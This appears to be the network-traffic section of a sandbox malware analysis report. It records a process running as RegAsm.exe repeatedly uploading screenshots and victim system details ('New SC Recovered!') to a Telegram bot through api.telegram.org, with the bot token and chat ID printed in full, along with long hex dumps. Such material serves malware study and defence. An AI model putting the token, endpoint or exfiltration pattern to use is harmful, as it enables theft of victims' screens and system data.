                                              2024-05-23 18:27:25 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:27:25 UTC1358OUTData Raw: b7 5c 06 3e a4 f7 fc 6b 0e 8a 28 00 a2 8a 29 80 56 bd cf 89 f5 cb 8b a9 67 fe d5 bc 8b cc 72 fe 5c 57 0e a8 b9 39 c2 8c f0 07 6a c8 a2 90 1a 72 eb 97 d3 cf 0c f7 12 79 f3 45 6d 25 b7 99 29 66 66 57 0e 09 24 9e 48 12 1c 7d 05 66 51 45 00 14 51 45 00 15 d7 4d e3 18 ae 63 89 25 b4 78 fc b5 c0 2a c1 b3 fc b1 d2 b9 1a 29 24 b9 d4 fa ad 81 eb 17 1e 8c ec a6 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 3f 59 f1 2a ea 3a 42 e9 c9 6c ca aa e1 c4 8c dc 9c 67 b6 3d fd 6b 9d a2 b3 8d 18 46 2a 09 68 9d fa ee 53 9b 72 e6 eb 6b 05 14 51 5a 92 15 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a c1 a2 a6 51 52 56 64 4e 0a 6a cc f4 cd 37 53 bb b9 6d af 79 b6 04 19 79 0e d0 71 e9 bb af eb 59 5e 2a f1 3c 12 5a bd 85 84 82 43 20 c4 92 2f 40 3d 07 ad 71 14 57 23 c1 a9 d5 55 2a 3b
                                              Data Ascii: \>k()Vgr\W9jryEm%)ffW$H}fQEQEMc%x*)$36b?Y*:Blg=kF*hSrkQZj"X'm+zQRVdNj7SmyyqY^*<ZC /@=qW#U*;
                                              2024-05-23 18:27:25 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 31 33 38 35 36 32 33 32 39 34 61 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dcd1385623294a--
                                              2024-05-23 18:27:25 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:27:25 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":278,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488845,"document":{"file_name":"user-715575 2024-09-10 01-31-47.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgEWZk-KjU5Hfj1f6JmlqWyuNFJ6cg8AAswTAALx64FSYbf4PzIsTQgBAAdtAAM1BA","file_unique_id":"AQADzBMAAvHrgVJy","file_size":12371,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgEWZk-KjU5Hfj1f6JmlqWyuNFJ6cg8AAswTAALx64FSYbf4PzIsTQgBAAdtAAM1BA","file_unique_id":"AQADzBMAAvHrgVJy","file_size":12371,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBFmZPio1OR349X-iZpalsrjRSenIPAALMEwAC8euBUmG3-D8yLE0INQQ","file_unique_id":"AgADzBMAAvHrgVI","file_size":66315},"caption":"New SC Recovered!\n\nTime: 09/10/2024 01:31:46\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.749740149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:27:30 UTC262OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dcd4fd1774ca5e
                                              Host: api.telegram.org
                                              Content-Length: 66944
                                              Expect: 100-continue
                                              Connection: Keep-Alive
                                              2024-05-23 18:27:31 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 34 66 64 31 37 37 34 63 61 35 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 34 66 64 31 37 37 34 63 61 35 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 31 34 2f 32 30 32 34 20 32 30 3a 32 37 3a 34 36 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dcd4fd1774ca5eContent-Disposition: form-data; name="chat_id"7153133538-----------------------------8dcd4fd1774ca5eContent-Disposition: form-data; name="caption"New SC Recovered!Time: 09/14/2024 20:27:46User
                                              2024-05-23 18:27:31 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:27:31 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:27:31 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
                                              2024-05-23 18:27:31 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:27:31 UTC1358OUTData Raw: b7 5c 06 3e a4 f7 fc 6b 0e 8a 28 00 a2 8a 29 80 56 bd cf 89 f5 cb 8b a9 67 fe d5 bc 8b cc 72 fe 5c 57 0e a8 b9 39 c2 8c f0 07 6a c8 a2 90 1a 72 eb 97 d3 cf 0c f7 12 79 f3 45 6d 25 b7 99 29 66 66 57 0e 09 24 9e 48 12 1c 7d 05 66 51 45 00 14 51 45 00 15 d7 4d e3 18 ae 63 89 25 b4 78 fc b5 c0 2a c1 b3 fc b1 d2 b9 1a 29 24 b9 d4 fa ad 81 eb 17 1e 8c ec a6 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 3f 59 f1 2a ea 3a 42 e9 c9 6c ca aa e1 c4 8c dc 9c 67 b6 3d fd 6b 9d a2 b3 8d 18 46 2a 09 68 9d fa ee 53 9b 72 e6 eb 6b 05 14 51 5a 92 15 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a c1 a2 a6 51 52 56 64 4e 0a 6a cc f4 cd 37 53 bb b9 6d af 79 b6 04 19 79 0e d0 71 e9 bb af eb 59 5e 2a f1 3c 12 5a bd 85 84 82 43 20 c4 92 2f 40 3d 07 ad 71 14 57 23 c1 a9 d5 55 2a 3b
                                              Data Ascii: \>k()Vgr\W9jryEm%)ffW$H}fQEQEMc%x*)$36b?Y*:Blg=kF*hSrkQZj"X'm+zQRVdNj7SmyyqY^*<ZC /@=qW#U*;
                                              2024-05-23 18:27:31 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 34 66 64 31 37 37 34 63 61 35 65 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dcd4fd1774ca5e--
                                              2024-05-23 18:27:31 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:27:31 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:27:31 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":279,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488851,"document":{"file_name":"user-715575 2024-09-14 20-37-46.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgEXZk-Kk2LKpFow_L0ZgvI8xUhOtQUAAs0TAALx64FSi8PycQgB70kBAAdtAAM1BA","file_unique_id":"AQADzRMAAvHrgVJy","file_size":12371,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgEXZk-Kk2LKpFow_L0ZgvI8xUhOtQUAAs0TAALx64FSi8PycQgB70kBAAdtAAM1BA","file_unique_id":"AQADzRMAAvHrgVJy","file_size":12371,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBF2ZPipNiyqRaMPy9GYLyPMVITrUFAALNEwAC8euBUovD8nEIAe9JNQQ","file_unique_id":"AgADzRMAAvHrgVI","file_size":66315},"caption":"New SC Recovered!\n\nTime: 09/14/2024 20:27:46\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.749741149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:27:36 UTC262OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dcd88e9847228c
                                              Host: api.telegram.org
                                              Content-Length: 67141
                                              Expect: 100-continue
                                              Connection: Keep-Alive
                                              2024-05-23 18:27:36 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:27:36 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 38 38 65 39 38 34 37 32 32 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 38 38 65 39 38 34 37 32 32 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 31 39 2f 32 30 32 34 20 30 39 3a 33 36 3a 35 32 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dcd88e9847228cContent-Disposition: form-data; name="chat_id"7153133538-----------------------------8dcd88e9847228cContent-Disposition: form-data; name="caption"New SC Recovered!Time: 09/19/2024 09:36:52User
                                              2024-05-23 18:27:36 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:27:36 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:27:36 UTC16355OUTData Raw: 40 c4 fa d1 47 e1 45 21 9d 45 4d 6d f7 db fd da 87 15 24 1f 78 fd 2b 8f 15 fc 19 1e 6e 0b fd e2 1e a5 a0 32 38 35 22 64 0e 0d 42 18 00 29 ea de 95 f3 c8 fa e6 39 a4 60 69 a7 27 92 69 1b 3d 47 4a 5d c3 14 c9 19 8e 79 35 1d c1 fd df e3 52 95 cf 35 04 df ea fa f7 ad b0 df c6 89 cd 8d ff 00 77 9f a1 0d 14 51 5f 42 7c 88 51 45 14 01 da 7f cb 3d 1b fd f1 ff 00 a2 5e 9f 77 ac 59 da 6a 10 59 4a f8 92 5e fd 97 d3 3f 5a cf d5 af 7f b3 b4 7d 36 ec 26 f3 19 5c 0f 73 13 01 fc eb 84 b8 9e 5b 99 de 79 9c bc 8e 72 c4 d7 93 87 c3 7b 65 77 b1 f5 18 8c 4f b1 76 5b 9e b2 48 c8 19 e4 d6 63 ff 00 a8 d6 bf de 3f fa 25 2b 8f 6d 62 e6 6b 7b 4b 91 29 fb 55 89 c1 c9 e1 d0 f7 fe 87 d7 22 ba 6b 1b d4 d4 34 9d 56 ee 30 55 64 2c 70 7b 11 0a 02 3f 31 59 d4 c3 ca 94 5b 7f d6 a6 94 f1 11
                                              Data Ascii: @GE!EMm$x+n285"dB)9`i'i=GJ]y5R5wQ_B|QE=^wYjYJ^?Z}6&\s[yr{ewOv[Hc?%+mbk{K)U"k4V0Ud,p{?1Y[
                                              2024-05-23 18:27:36 UTC15447OUTData Raw: 28 c5 14 52 00 a4 a5 a4 a0 61 49 ef 4b cd 25 30 0e b4 73 e9 45 14 86 25 14 b4 9f 85 30 0a 4f a5 2f d2 8a 06 75 34 51 45 41 e0 85 15 6f 4e b2 37 d3 b4 41 f6 15 4d d9 c6 73 c8 ff 00 1a b9 fd 88 41 c1 b8 c1 ff 00 73 ff 00 af 5c 95 b1 b4 28 4b 96 a4 ac fd 1f f9 1d 94 70 35 eb c7 9e 9c 6e bd 57 f9 99 14 56 c8 d0 b3 ff 00 2f 3f f8 e7 ff 00 5e a2 bc d1 fe cb 6a f3 fd a3 7e dc 71 b3 1d 4e 3d 6a 21 99 61 a7 25 18 cb 57 e4 ff 00 c8 b9 e5 b8 a8 45 ca 51 d1 79 af f3 32 e8 a2 8a ee 38 02 8a 28 a0 02 8a 28 a0 02 8a ea ed fc 3d 63 2d b4 52 31 94 17 40 c7 0d ea 3e 95 27 fc 23 76 1f de 9b fe fa 1f e1 5c 3f 5e a7 d9 ff 00 5f 33 d5 fe ca ad dd 7e 3f e4 72 14 57 55 71 e1 eb 18 ad e5 91 5a 6c a2 16 19 61 d8 7d 2b 17 55 d3 5e c2 6c 8c b4 2d f7 5b fa 1a d2 9e 2e 9d 49 72 ad 0c
                                              Data Ascii: (RaIK%0sE%0O/u4QEAoN7AMsAs\(Kp5nWV/?^j~qN=j!a%WEQy28((=c-R1@>'#v\?^_3~?rWUqZla}+U^l-[.Ir
                                              2024-05-23 18:27:36 UTC1555OUTData Raw: 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 04 ff 00 f1 ef 27 fb a7 f9 57 cf 35 f4 1c d3 44 60 90 09 10 92 a7 f8 87 a5 7c f9 57 13 39 85 6e 69 9e 24 9e ce c7 ec 17 36 b0 5f d9 e7 72 c3 70 b9 0a 7d 41 ed f8 56 1d 15 44 1b 9a 9f 89 27 bc b1 fb 05 b5 ac 16 16 79 dc d0 db ae 03 1f 52 7b fe 35 87 45 14 00 51 45 14 c0 2b 5e e7 c4 fa e5 c5 d4 b3 ff 00 6a de 45 e6 39 7f 2e 2b 87 54 5c 9c e1 46 78 03 b5 64 51 48 0d 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db
                                              Data Ascii: |??@QQT|??@QQT|??@QQT|??@QQT|??@QQT|??@'W5D`|W9ni$6_rp}AVD'yR{5EQE+^jE9.+T\FxdQH9u{<
                                              2024-05-23 18:27:36 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 38 38 65 39 38 34 37 32 32 38 63 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dcd88e9847228c--
                                              2024-05-23 18:27:36 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:27:36 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":280,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488856,"document":{"file_name":"user-715575 2024-09-19 09-36-53.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgEYZk-KmMxiyZA2t3UDQ0P9r2Wei6QAAs4TAALx64FSZWI5p8qEKYYBAAdtAAM1BA","file_unique_id":"AQADzhMAAvHrgVJy","file_size":12370,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgEYZk-KmMxiyZA2t3UDQ0P9r2Wei6QAAs4TAALx64FSZWI5p8qEKYYBAAdtAAM1BA","file_unique_id":"AQADzhMAAvHrgVJy","file_size":12370,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBGGZPipjMYsmQNrd1A0ND_a9lnoukAALOEwAC8euBUmViOafKhCmGNQQ","file_unique_id":"AgADzhMAAvHrgVI","file_size":66512},"caption":"New SC Recovered!\n\nTime: 09/19/2024 09:36:52\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.749742149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:27:38 UTC262OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dcdb4778e8706b
                                              Host: api.telegram.org
                                              Content-Length: 66944
                                              Expect: 100-continue
                                              Connection: Keep-Alive
